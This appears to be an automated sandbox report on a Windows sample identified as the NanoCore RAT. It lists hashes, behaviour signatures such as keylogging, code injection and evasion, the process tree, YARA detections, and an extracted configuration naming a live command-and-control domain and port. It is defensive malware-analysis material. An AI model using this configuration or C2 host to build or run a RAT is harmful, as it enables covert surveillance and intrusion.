Play interactive tour

Edit tour

Windows Analysis Report wIQLBHYbqz

Overview

General Information

Sample Name:	wIQLBHYbqz (renamed file extension from none to exe)
Analysis ID:	483799
MD5:	1312d6ff22dbd8e9e05d1b0d9130439d
SHA1:	913051c8f41e722c522e637bdbdfa563ecfba4ff
SHA256:	543694f8b09a565a88932457d40d16cd85ac3f0b7be9ad322ef9486144379449
Tags:	exeNanoCore
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected FrenchyShellcode packer

Sigma detected: NanoCore

Detected Nanocore Rat

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Yara detected Nanocore RAT

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Writes to foreign memory regions

Binary is likely a compiled AutoIt script file

.NET source code contains potential unpacker

AutoIt script contains suspicious strings

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Creates a start menu entry (Start Menu\Programs\Startup)

Potential key logger detected (key state polling based)

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

wIQLBHYbqz.exe (PID: 4904 cmdline: 'C:\Users\user\Desktop\wIQLBHYbqz.exe' MD5: 1312D6FF22DBD8E9E05D1B0D9130439D)

RegAsm.exe (PID: 4936 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)

RMActivate_isv.exe.bat (PID: 6788 cmdline: 'C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat' MD5: F9F1A2B23DF822033EC717757776CBB7)

RegAsm.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "0622add8-a38b-49c1-8dc8-c09cf432", "Group": "NewLappi", "Domain1": "megida.hopto.org", "Domain2": "", "Port": 8822, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x108f5:$x1: NanoCore.ClientPluginHost 0x10932:$x2: IClientNetworkHost 0x14465:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1065d:$a: NanoCore 0x1066d:$a: NanoCore 0x108a1:$a: NanoCore 0x108b5:$a: NanoCore 0x108f5:$a: NanoCore 0x106bc:$b: ClientPlugin 0x108be:$b: ClientPlugin 0x108fe:$b: ClientPlugin 0x107e3:$c: ProjectData 0x111ea:$d: DESCrypto 0x18bb6:$e: KeepAlive 0x16ba4:$g: LogClientMessage 0x12d9f:$i: get_Connected 0x11520:$j: #=q 0x11550:$j: #=q 0x1156c:$j: #=q 0x1159c:$j: #=q 0x115b8:$j: #=q 0x115d4:$j: #=q 0x11604:$j: #=q 0x11620:$j: #=q
00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d005:$x1: NanoCore.ClientPluginHost 0x3d042:$x2: IClientNetworkHost 0xf05f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x40b75:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3cd6d:$a: NanoCore 0x3cd7d:$a: NanoCore 0x3cfb1:$a: NanoCore 0x3cfc5:$a: NanoCore 0x3d005:$a: NanoCore 0x3cdcc:$b: ClientPlugin 0x3cfce:$b: ClientPlugin 0x3d00e:$b: ClientPlugin 0x3cef3:$c: ProjectData 0x3d8fa:$d: DESCrypto 0x452c6:$e: KeepAlive 0x11654:$g: LogClientMessage 0x432b4:$g: LogClientMessage 0x3f4af:$i: get_Connected 0xc22e:$j: #=q 0xc4ad:$j: #=q 0xd469:$j: #=q 0xe37f:$j: #=q 0xe39b:$j: #=q 0xe3cb:$j: #=q 0xe3e7:$j: #=q
00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x23a47:$a: NanoCore 0x23aa0:$a: NanoCore 0x23add:$a: NanoCore 0x23b56:$a: NanoCore 0x23aa9:$b: ClientPlugin 0x23ae6:$b: ClientPlugin 0x243e4:$b: ClientPlugin 0x243f1:$b: ClientPlugin 0x1b28f:$e: KeepAlive 0x23f31:$g: LogClientMessage 0x23eb1:$i: get_Connected 0x15a79:$j: #=q 0x15aa9:$j: #=q 0x15ae5:$j: #=q 0x15b0d:$j: #=q 0x15b3d:$j: #=q 0x15b6d:$j: #=q 0x15b9d:$j: #=q 0x15bcd:$j: #=q 0x15be9:$j: #=q 0x15c19:$j: #=q
0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x678f5:$x1: NanoCore.ClientPluginHost 0x67932:$x2: IClientNetworkHost 0xda77:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3994f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6b465:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6765d:$a: NanoCore 0x6766d:$a: NanoCore 0x678a1:$a: NanoCore 0x678b5:$a: NanoCore 0x678f5:$a: NanoCore 0x676bc:$b: ClientPlugin 0x678be:$b: ClientPlugin 0x678fe:$b: ClientPlugin 0x677e3:$c: ProjectData 0x681ea:$d: DESCrypto 0x6fbb6:$e: KeepAlive 0x1006c:$g: LogClientMessage 0x3bf44:$g: LogClientMessage 0x6dba4:$g: LogClientMessage 0x69d9f:$i: get_Connected 0xac46:$j: #=q 0xaec5:$j: #=q 0xbe81:$j: #=q 0xcd97:$j: #=q 0xcdb3:$j: #=q 0xcde3:$j: #=q
00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x67005:$x1: NanoCore.ClientPluginHost 0x67042:$x2: IClientNetworkHost 0xd187:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3905f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6ab75:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x90e0f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x66d6d:$a: NanoCore 0x66d7d:$a: NanoCore 0x66fb1:$a: NanoCore 0x66fc5:$a: NanoCore 0x67005:$a: NanoCore 0x66dcc:$b: ClientPlugin 0x66fce:$b: ClientPlugin 0x6700e:$b: ClientPlugin 0x66ef3:$c: ProjectData 0x678fa:$d: DESCrypto 0x6f2c6:$e: KeepAlive 0xf77c:$g: LogClientMessage 0x3b654:$g: LogClientMessage 0x6d2b4:$g: LogClientMessage 0x93404:$g: LogClientMessage 0x694af:$i: get_Connected 0xa356:$j: #=q 0xa5d5:$j: #=q 0xb591:$j: #=q 0xc4a7:$j: #=q 0xc4c3:$j: #=q
0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101ad:$x1: NanoCore.ClientPluginHost 0x101ea:$x2: IClientNetworkHost 0x13d1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff15:$a: NanoCore 0xff25:$a: NanoCore 0x10159:$a: NanoCore 0x1016d:$a: NanoCore 0x101ad:$a: NanoCore 0xff74:$b: ClientPlugin 0x10176:$b: ClientPlugin 0x101b6:$b: ClientPlugin 0x1009b:$c: ProjectData 0x10aa2:$d: DESCrypto 0x1846e:$e: KeepAlive 0x1645c:$g: LogClientMessage 0x12657:$i: get_Connected 0x10dd8:$j: #=q 0x10e08:$j: #=q 0x10e24:$j: #=q 0x10e54:$j: #=q 0x10e70:$j: #=q 0x10e8c:$j: #=q 0x10ebc:$j: #=q 0x10ed8:$j: #=q
00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x18705:$x1: NanoCore.ClientPluginHost 0x18742:$x2: IClientNetworkHost 0x1c275:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1846d:$a: NanoCore 0x1847d:$a: NanoCore 0x186b1:$a: NanoCore 0x186c5:$a: NanoCore 0x18705:$a: NanoCore 0x184cc:$b: ClientPlugin 0x186ce:$b: ClientPlugin 0x1870e:$b: ClientPlugin 0x185f3:$c: ProjectData 0x18ffa:$d: DESCrypto 0x209c6:$e: KeepAlive 0x1e9b4:$g: LogClientMessage 0x1abaf:$i: get_Connected 0x19330:$j: #=q 0x19360:$j: #=q 0x1937c:$j: #=q 0x193ac:$j: #=q 0x193c8:$j: #=q 0x193e4:$j: #=q 0x19414:$j: #=q 0x19430:$j: #=q
0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1c1a5:$x1: NanoCore.ClientPluginHost 0x4ebad:$x1: NanoCore.ClientPluginHost 0x815b5:$x1: NanoCore.ClientPluginHost 0x1c1e2:$x2: IClientNetworkHost 0x4ebea:$x2: IClientNetworkHost 0x815f2:$x2: IClientNetworkHost 0x1fd15:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5271d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x85125:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1bf0d:$a: NanoCore 0x1bf1d:$a: NanoCore 0x1c151:$a: NanoCore 0x1c165:$a: NanoCore 0x1c1a5:$a: NanoCore 0x4e915:$a: NanoCore 0x4e925:$a: NanoCore 0x4eb59:$a: NanoCore 0x4eb6d:$a: NanoCore 0x4ebad:$a: NanoCore 0x8131d:$a: NanoCore 0x8132d:$a: NanoCore 0x81561:$a: NanoCore 0x81575:$a: NanoCore 0x815b5:$a: NanoCore 0x1bf6c:$b: ClientPlugin 0x1c16e:$b: ClientPlugin 0x1c1ae:$b: ClientPlugin 0x4e974:$b: ClientPlugin 0x4eb76:$b: ClientPlugin 0x4ebb6:$b: ClientPlugin
0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xbf8f5:$x1: NanoCore.ClientPluginHost 0xbf932:$x2: IClientNetworkHost 0xd8df:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x39b9f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x65a77:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x9194f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc3465:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xbf65d:$a: NanoCore 0xbf66d:$a: NanoCore 0xbf8a1:$a: NanoCore 0xbf8b5:$a: NanoCore 0xbf8f5:$a: NanoCore 0xbf6bc:$b: ClientPlugin 0xbf8be:$b: ClientPlugin 0xbf8fe:$b: ClientPlugin 0xbf7e3:$c: ProjectData 0xc01ea:$d: DESCrypto 0xc7bb6:$e: KeepAlive 0xfed4:$g: LogClientMessage 0x3c194:$g: LogClientMessage 0x6806c:$g: LogClientMessage 0x93f44:$g: LogClientMessage 0xc5ba4:$g: LogClientMessage 0xc1d9f:$i: get_Connected 0xaaae:$j: #=q 0xad2d:$j: #=q 0xbce9:$j: #=q 0xcbff:$j: #=q
00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf1d5:$x1: NanoCore.ClientPluginHost 0xf212:$x2: IClientNetworkHost 0x12d45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xef3d:$a: NanoCore 0xef4d:$a: NanoCore 0xf181:$a: NanoCore 0xf195:$a: NanoCore 0xf1d5:$a: NanoCore 0xef9c:$b: ClientPlugin 0xf19e:$b: ClientPlugin 0xf1de:$b: ClientPlugin 0xf0c3:$c: ProjectData 0xfaca:$d: DESCrypto 0x17496:$e: KeepAlive 0x15484:$g: LogClientMessage 0x1167f:$i: get_Connected 0xfe00:$j: #=q 0xfe30:$j: #=q 0xfe4c:$j: #=q 0xfe7c:$j: #=q 0xfe98:$j: #=q 0xfeb4:$j: #=q 0xfee4:$j: #=q 0xff00:$j: #=q
0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x33cd:$a: NanoCore 0x3426:$a: NanoCore 0x3463:$a: NanoCore 0x34dc:$a: NanoCore 0x16b87:$a: NanoCore 0x16b9c:$a: NanoCore 0x16bd1:$a: NanoCore 0x2f643:$a: NanoCore 0x2f658:$a: NanoCore 0x2f68d:$a: NanoCore 0x342f:$b: ClientPlugin 0x346c:$b: ClientPlugin 0x3d6a:$b: ClientPlugin 0x3d77:$b: ClientPlugin 0x16943:$b: ClientPlugin 0x1695e:$b: ClientPlugin 0x1698e:$b: ClientPlugin 0x16ba5:$b: ClientPlugin 0x16bda:$b: ClientPlugin 0x2f3ff:$b: ClientPlugin 0x2f41a:$b: ClientPlugin
00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4148d:$x1: NanoCore.ClientPluginHost 0x414ca:$x2: IClientNetworkHost 0x44ffd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x411f5:$a: NanoCore 0x41205:$a: NanoCore 0x41439:$a: NanoCore 0x4144d:$a: NanoCore 0x4148d:$a: NanoCore 0x41254:$b: ClientPlugin 0x41456:$b: ClientPlugin 0x41496:$b: ClientPlugin 0x4137b:$c: ProjectData 0x41d82:$d: DESCrypto 0x4974e:$e: KeepAlive 0x4773c:$g: LogClientMessage 0x43937:$i: get_Connected 0x420b8:$j: #=q 0x420e8:$j: #=q 0x42104:$j: #=q 0x42134:$j: #=q 0x42150:$j: #=q 0x4216c:$j: #=q 0x4219c:$j: #=q 0x421b8:$j: #=q
0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf2fd:$x1: NanoCore.ClientPluginHost 0xf33a:$x2: IClientNetworkHost 0x12e6d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf065:$a: NanoCore 0xf075:$a: NanoCore 0xf2a9:$a: NanoCore 0xf2bd:$a: NanoCore 0xf2fd:$a: NanoCore 0xf0c4:$b: ClientPlugin 0xf2c6:$b: ClientPlugin 0xf306:$b: ClientPlugin 0xf1eb:$c: ProjectData 0xfbf2:$d: DESCrypto 0x175be:$e: KeepAlive 0x155ac:$g: LogClientMessage 0x117a7:$i: get_Connected 0xff28:$j: #=q 0xff58:$j: #=q 0xff74:$j: #=q 0xffa4:$j: #=q 0xffc0:$j: #=q 0xffdc:$j: #=q 0x1000c:$j: #=q 0x10028:$j: #=q
00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x493cd:$a: NanoCore 0x49426:$a: NanoCore 0x49463:$a: NanoCore 0x494dc:$a: NanoCore 0x5cb87:$a: NanoCore 0x5cb9c:$a: NanoCore 0x5cbd1:$a: NanoCore 0x75643:$a: NanoCore 0x75658:$a: NanoCore 0x7568d:$a: NanoCore 0x4942f:$b: ClientPlugin 0x4946c:$b: ClientPlugin 0x49d6a:$b: ClientPlugin 0x49d77:$b: ClientPlugin 0x5c943:$b: ClientPlugin 0x5c95e:$b: ClientPlugin 0x5c98e:$b: ClientPlugin 0x5cba5:$b: ClientPlugin 0x5cbda:$b: ClientPlugin 0x753ff:$b: ClientPlugin 0x7541a:$b: ClientPlugin
0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3c8f5:$x1: NanoCore.ClientPluginHost 0x3c932:$x2: IClientNetworkHost 0xe94f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x40465:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
